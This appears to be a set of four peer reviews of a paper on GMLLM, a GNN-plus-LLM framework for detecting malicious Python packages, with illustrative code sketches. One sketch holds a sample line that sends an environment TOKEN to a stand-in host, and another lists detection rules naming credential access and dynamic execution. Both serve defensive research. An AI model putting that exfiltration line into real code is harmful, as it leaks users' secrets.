How Can LLMs Serve as Experts in Malicious Code Detection? A Graph Representation Learning Based Approach
Soundness: 3: good
Presentation: 3: good
Contribution: 3: good
Rating: 6: marginally above the acceptance threshold
Confidence: 4: You are confident in your assessment, but not absolutely certain. It is unlikely, but not impossible, that you did not understand some parts of the submission or that you are unfamiliar with some pieces of related work.
Summary:
This paper proposes GMLLM, a novel framework that enhances the capability of Large Language Models (LLMs) in detecting malicious code by integrating graph representation learning. The key idea is to use a Graph Neural Network (GNN) trained on code graphs to identify critical code regions that are most likely malicious. These regions then guide the LLM's attention, enabling it to focus on suspicious subgraphs rather than processing entire codebases. This approach effectively mitigates LLMs' limitations in handling large-scale and complex code dependencies. The authors validate their method on both public datasets and a newly constructed MalCP dataset, demonstrating superior performance in detection accuracy, interpretability, and computational efficiency compared to existing LLM-based and rule-based tools.
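To make the setup concrete for other readers, here is a minimal sketch of the kind of code graph the GNN is trained on, assuming Python's ast module and NetworkX. This is an illustrative reconstruction only, not the authors' implementation, which additionally links files through import-dependency and call-graph edges.

```python
import ast
import networkx as nx

def build_ast_graph(source: str) -> nx.DiGraph:
    """Toy code graph for a single Python file: AST nodes linked by
    parent-child edges. The paper's full graph also connects files via
    import dependencies and a call graph (omitted here)."""
    tree = ast.parse(source)
    graph = nx.DiGraph()
    for parent in ast.walk(tree):
        graph.add_node(id(parent), kind=type(parent).__name__)
        for child in ast.iter_child_nodes(parent):
            graph.add_node(id(child), kind=type(child).__name__)
            graph.add_edge(id(parent), id(child))
    return graph

# A snippet resembling a typical exfiltration pattern in malicious packages.
snippet = (
    "import os, urllib.request\n"
    "urllib.request.urlopen('http://collector.example', "
    "data=os.environ.get('TOKEN', '').encode())\n"
)
g = build_ast_graph(snippet)
print(g.number_of_nodes(), "nodes,", g.number_of_edges(), "edges")
```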
Strengths:
Novel Framework: The integration of GNN for attention guidance and LLM for fine-grained analysis is innovative and well-executed.
Comprehensive Evaluation: Extensive experiments across multiple datasets, model sizes, and metrics (accuracy, token efficiency, explainability) provide strong empirical evidence.
Practical Relevance: The method significantly reduces computational cost while improving detection performance, making it suitable for real-world deployment.
Reproducibility: The paper includes detailed prompts, dataset construction procedures, and code release, facilitating replication and extension.
Weaknesses:
Language Scope: The method is currently evaluated only on Python code. While this scope is justified, it limits generalizability to other languages.
Baseline Diversity: Although multiple tools are compared, some recent LLM-based security detection methods (e.g., MalPaCA, CodeBERT-based detectors) are not included.
Rule Generation Dependency: The rule generation via LLM, while automated, may inherit biases or limitations of the underlying LLM used for rule synthesis.
Questions:
Generalizability: Have the authors considered applying GMLLM to other programming languages (e.g., JavaScript, C++)? If so, what adaptations would be necessary?
Rule Robustness: How sensitive is the performance to the quality of the automatically generated rules? Could manually curated rules further improve results?
Real-World Deployment: How does the system handle adversarial code obfuscation or evasion techniques not seen during training?
Ablation Study: Could the authors provide an ablation on the contribution of the GNN component vs. the LLM component in the final performance?
Fully AI-generated |
How Can LLMs Serve as Experts in Malicious Code Detection? A Graph Representation Learning Based Approach
Soundness: 2: fair
Presentation: 3: good
Contribution: 2: fair
Rating: 6: marginally above the acceptance threshold
Confidence: 4: You are confident in your assessment, but not absolutely certain. It is unlikely, but not impossible, that you did not understand some parts of the submission or that you are unfamiliar with some pieces of related work.
Summary:
The paper asks why LLMs underperform professional tools on malicious Python package detection and proposes GMLLM, a two-stage framework that (i) builds a code graph for a package (AST + dependencies + call graph), extracts node features via LLM-generated sensitive-behavior rules, and trains a GNN for coarse binary detection, then (ii) explains the GNN prediction by optimizing edge/feature masks to get high-attention subgraphs, which are finally sent to an LLM for focused, high-precision analysis. This is meant to solve the “LLM pays for irrelevant code” problem by feeding only suspicious slices to the LLM. On four datasets (Backstabbers, Datadog, Mal-OSS, and their new MalCP), GMLLM (especially with GPT-4o as the backend) reports higher recall/precision/accuracy than both raw LLMs and rule/ML tools, while using far fewer tokens because it prunes benign code first.
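To make the feature-extraction step concrete, below is a rough sketch of how a multi-hot node feature over sensitive-behavior rules could be computed. The rule strings and the substring matcher are illustrative placeholders; the paper derives its rule sets ($S_{comm}$, $S_{data}$) with an LLM and does not necessarily match rules this way.

```python
from typing import List

# Hypothetical sensitive-behavior rules; the paper generates such rules with an LLM.
RULES: List[str] = [
    "urllib.request.urlopen",  # outbound network request
    "subprocess.Popen",        # process spawning
    "os.environ",              # environment/credential access
    "base64.b64decode",        # payload decoding
    "exec(",                   # dynamic code execution
]

def node_features(node_source: str, rules: List[str] = RULES) -> List[int]:
    """Multi-hot feature vector for one graph node: entry i is 1 if rule i
    matches the node's source text. Substring matching is a stand-in for
    whatever matcher the authors actually use."""
    return [int(rule in node_source) for rule in rules]

print(node_features("data = base64.b64decode(payload); exec(data)"))
```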
Strengths:
Originality: Clear decomposition of the task into coarse structural suspicion (GNN) and fine semantic judgment (LLM), with an explicit mask-optimization “explainer” to turn the GNN into an attention generator for the LLM. This is a clean answer to “how can LLMs serve as experts” on large codebases.
Quality: The method is fully specified: graph construction from all .py files, LLM-generated rule sets $S_{comm}$ and $S_{data}$, a GCN trained with cross-entropy (Eq. 1), per-sample mask optimization (Eqs. 2–8) to get node/edge attention, and thresholding to build the LLM input (Eq. 11). The objective combines prediction, sparsity, and entropy, which is standard for explanation-style masking (a generic form of this objective is written out after the strengths below). Results on public and custom data consistently show gains, and token-usage analysis backs the efficiency claim.
Clarity: The pipeline in Fig. 2 is easy to follow; the explanation loss is written down in detail; examples of the final LLM input are shown. The four RQs in Section 4 map cleanly to the experiments.
Significance: If the MalCP dataset is as large/diverse as described, a practical recipe for “GNN filters, LLM inspects” on PyPI-style malware is useful for software-supply-chain security, because it directly tackles scalability and cost.
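For reference, the generic explanation-masking objective that this kind of approach instantiates (e.g., GNNExplainer-style) has roughly the following form; the notation is mine, and the paper's Eqs. 2–8 may differ in weighting and parameterization:

$$\min_{M^{edge},\,M^{feat}} \; -\log P_{\Phi}\!\left(\hat{y} \mid A \odot \sigma(M^{edge}),\; X \odot \sigma(M^{feat})\right) \;+\; \lambda_{1}\,\lVert \sigma(M^{edge}) \rVert_{1} \;+\; \lambda_{2}\, H\!\left(\sigma(M^{edge})\right),$$

where $\Phi$ is the trained GNN, $\hat{y}$ its prediction for the sample, $A$ and $X$ the adjacency and node-feature matrices, $\sigma$ the sigmoid, the $\ell_1$ term enforces sparsity, and $H$ is an element-wise entropy term that pushes the mask toward binary values.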
Weaknesses:
- LLM-generated rules are both features and supervision hints. The feature vector $h_v$ is a multi-hot vector over rules that are themselves produced by an LLM from the same general capability the method is trying to “enhance.” This risks circularity: performance may partly reflect how good the LLM was at rule generation, not how good the GMLLM pipeline is. A baseline with only human/common rules $S_{comm}$ is missing.
- Per-sample mask optimization can be expensive and brittle. The attention extraction optimizes masks $M_j^{edge}, M_j^{feat}$ for each graph to keep only structures that keep the sample malicious (Eqs. 5–8). This is essentially running an explainer at inference time; real-world deployment on large PyPI/OSS feeds may make this step a bottleneck, and the paper does not profile this cost (a sketch of what this per-sample optimization typically entails follows the weaknesses below).
- Evaluation has an “LLM judges LLM” component. The description-quality metrics in Table 3 are LLM-evaluated, and GMLLM uses LLM-produced inputs, so there is a risk of favorable bias. The paper should also show human or tool-based adjudication on a subset.
- Generality is narrower than it sounds. Everything is built around Python (AST, package layout, PyPI-style attacks); it is not obvious that the same rule-extraction and masking will work unchanged for, say, obfuscated JS/npm malware or mixed-language repos. Yet the introduction frames it as “LLMs in software security.”
- Comparisons to strong non-LLM ML baselines look close. On some datasets, tools like MPHunter/Ea4mp are already very strong, and GMLLM wins mainly when paired with GPT-4o; the Llama-3 version is notably weaker, suggesting the final gain depends a lot on the downstream LLM quality.
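To make the cost concern in the second weakness concrete, here is a minimal sketch of what per-sample mask optimization typically entails at inference time. The one-layer GCN, step count, and regularizer weights are stand-ins, not the authors' settings.

```python
import torch

class TinyGCN(torch.nn.Module):
    """Stand-in one-layer GCN on a dense adjacency (not the paper's model)."""
    def __init__(self, in_dim: int, n_classes: int = 2):
        super().__init__()
        self.lin = torch.nn.Linear(in_dim, n_classes)

    def forward(self, adj, feats):
        h = adj @ feats                                # neighborhood aggregation
        return self.lin(h).mean(dim=0, keepdim=True)   # graph-level logits

def explain_sample(adj, feats, model, label, steps=200, lam_sparse=0.01, lam_ent=0.1):
    """Optimize an edge mask for ONE graph so that the masked graph keeps the
    model's (malicious) prediction while staying sparse and near-binary.
    This loop runs per sample at inference time, hence the cost concern."""
    edge_mask = torch.randn_like(adj, requires_grad=True)
    opt = torch.optim.Adam([edge_mask], lr=0.05)
    for _ in range(steps):
        m = torch.sigmoid(edge_mask)
        logits = model(adj * m, feats)
        pred_loss = torch.nn.functional.cross_entropy(logits, label)
        sparsity = m.sum()
        entropy = -(m * (m + 1e-8).log() + (1 - m) * (1 - m + 1e-8).log()).mean()
        loss = pred_loss + lam_sparse * sparsity + lam_ent * entropy
        opt.zero_grad()
        loss.backward()
        opt.step()
    return torch.sigmoid(edge_mask).detach()

n_nodes, n_feats = 6, 5
adj = (torch.rand(n_nodes, n_nodes) > 0.6).float()
feats = torch.rand(n_nodes, n_feats)
mask = explain_sample(adj, feats, TinyGCN(n_feats), label=torch.tensor([1]))
print(mask.shape)  # per-edge attention scores, to be thresholded downstream
```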
Questions:
1- How sensitive is the method to the number and quality of LLM-generated rules in $S_{data}$? If only 10% of the data is used to generate rules, does performance plateau or keep growing? An ablation on rule-set size would clarify whether LLM rule generation is a bottleneck.
2- The mask loss (Eq. 8) is optimized per sample. What is the average time/number of gradient steps per project for large MalCP packages, and is it done online or cached? Without this, it is hard to assess the “practical deployment” claim.
3- In Eq. (11), you threshold both nodes and edges. How are $\gamma_{node}$ and $\gamma_{edge}$ chosen, and are they the same across datasets? Detection quality may be quite sensitive to these values (a small sketch of this thresholding step follows the questions).
4- For Table 2, the Large subset is where baselines struggle. Are the same GNN parameters used across all three sizes, or is the GNN retrained per subset? If retrained, this should be stated explicitly to avoid accidental data-size leakage.
5- Since you say code and data are in the supplementary materials, do you also release the exact prompts for $S_{comm}$, $S_{data}$, and $\rho_{ana}$? Reproducibility of the whole pipeline depends on those.
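To illustrate question 3, here is a small sketch of the kind of thresholding step Eq. (11) presumably performs; the scores and thresholds are illustrative only.

```python
import torch

def select_subgraph(node_scores, edge_scores, gamma_node=0.5, gamma_edge=0.5):
    """Keep nodes/edges whose attention exceeds the thresholds; the surviving
    code regions are what the LLM ultimately sees. Small threshold changes can
    noticeably change how much code is forwarded."""
    keep_nodes = (node_scores >= gamma_node).nonzero(as_tuple=True)[0]
    keep_edges = (edge_scores >= gamma_edge).nonzero(as_tuple=True)
    return keep_nodes, keep_edges

node_scores = torch.tensor([0.9, 0.2, 0.7, 0.4])
edge_scores = torch.tensor([[0.0, 0.8], [0.3, 0.0]])
nodes, edges = select_subgraph(node_scores, edge_scores)
print(nodes.tolist(), list(zip(*[t.tolist() for t in edges])))
```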
Fully AI-generated |
How Can LLMs Serve as Experts in Malicious Code Detection? A Graph Representation Learning Based Approach
Soundness: 3: good
Presentation: 3: good
Contribution: 2: fair
Rating: 4: marginally below the acceptance threshold
Confidence: 3: You are fairly confident in your assessment. It is possible that you did not understand some parts of the submission or that you are unfamiliar with some pieces of related work. Math/other details were not carefully checked.
Summary:
This paper proposes GMLLM, a hybrid framework combining Graph Neural Networks (GNNs) and Large Language Models (LLMs) for malicious code detection. The method first trains a lightweight GNN on graph-structured code representations to localize potentially malicious segments, which are then further analyzed by an LLM. Experiments on multiple datasets, including a newly constructed MalCP dataset, demonstrate substantial performance improvements and significant token efficiency.
Strengths:
1. The GNN-guided attention mechanism is conceptually sound and effectively reduces computational costs.
2. Experiments are thorough, covering public and custom datasets with convincing results.
Weaknesses:
The metrics “Threat Generality,” “Evidence Groundedness,” and “Factual Alignment” appear to be LLM-evaluated. This introduces circularity: one LLM evaluates another LLM's output. Independent human or tool-based assessments would provide stronger validity.
In addition, the MalCP dataset's construction details are only briefly discussed. Are the malicious labels derived from ground-truth CVEs, dynamic execution, or heuristic rules? How balanced are the samples across package size and attack type? Is there contamination from public repositories used to pretrain LLMs? These factors critically affect generalization and could explain part of the performance gains.
Questions:
The paper introduces metrics such as Threat Generality, Evidence Groundedness, and Factual Alignment, which appear to rely on LLM-based judgments.
Could the authors clarify how these metrics are computed and whether human or external validation was conducted?
Using an LLM to evaluate another LLM introduces circularity and potential bias; please discuss how this limitation was mitigated and whether inter-rater reliability with human evaluators was measured.
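If human adjudication is added on a subset, even a simple agreement statistic between the LLM judge and a human annotator would strengthen the claim, for example Cohen's kappa. A minimal sketch with hypothetical labels:

```python
from collections import Counter

def cohens_kappa(labels_a, labels_b):
    """Cohen's kappa: chance-corrected agreement between two raters."""
    assert len(labels_a) == len(labels_b)
    n = len(labels_a)
    observed = sum(a == b for a, b in zip(labels_a, labels_b)) / n
    counts_a, counts_b = Counter(labels_a), Counter(labels_b)
    expected = sum(counts_a[c] * counts_b.get(c, 0) for c in counts_a) / (n * n)
    return (observed - expected) / (1 - expected)

# Hypothetical verdicts on 10 generated threat descriptions (1 = acceptable).
llm_judge = [1, 1, 0, 1, 1, 1, 0, 1, 1, 0]
human = [1, 0, 0, 1, 1, 1, 0, 1, 0, 0]
print(round(cohens_kappa(llm_judge, human), 2))
```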
Heavily AI-edited |
How Can LLMs Serve as Experts in Malicious Code Detection? A Graph Representation Learning Based Approach
Soundness: 3: good
Presentation: 3: good
Contribution: 2: fair
Rating: 4: marginally below the acceptance threshold
Confidence: 2: You are willing to defend your assessment, but it is quite likely that you did not understand the central parts of the submission or that you are unfamiliar with some pieces of related work. Math/other details were not carefully checked.
Summary:
This paper proposes a method that constructs a graph representation of code and trains a graph neural network (GNN) with minimally labeled data to address the challenges that large language models face in detecting malicious code.
Strengths:
The authors investigate an interesting and practical problem and provide a viable solution.
Weaknesses:
1. The methodological justification should be clarified. For instance, the rationale for employing a GNN and its specific role within the proposed framework should be explicitly explained.
2. How is utility evaluated, and what is the performance of the code after malicious-code detection and handling?
3. How do the results compare with other works discussed in the related work section?
4. In the experimental section, the detailed sizes or configurations of the models should be provided.
Questions:
See Weaknesses.
Moderately AI-edited |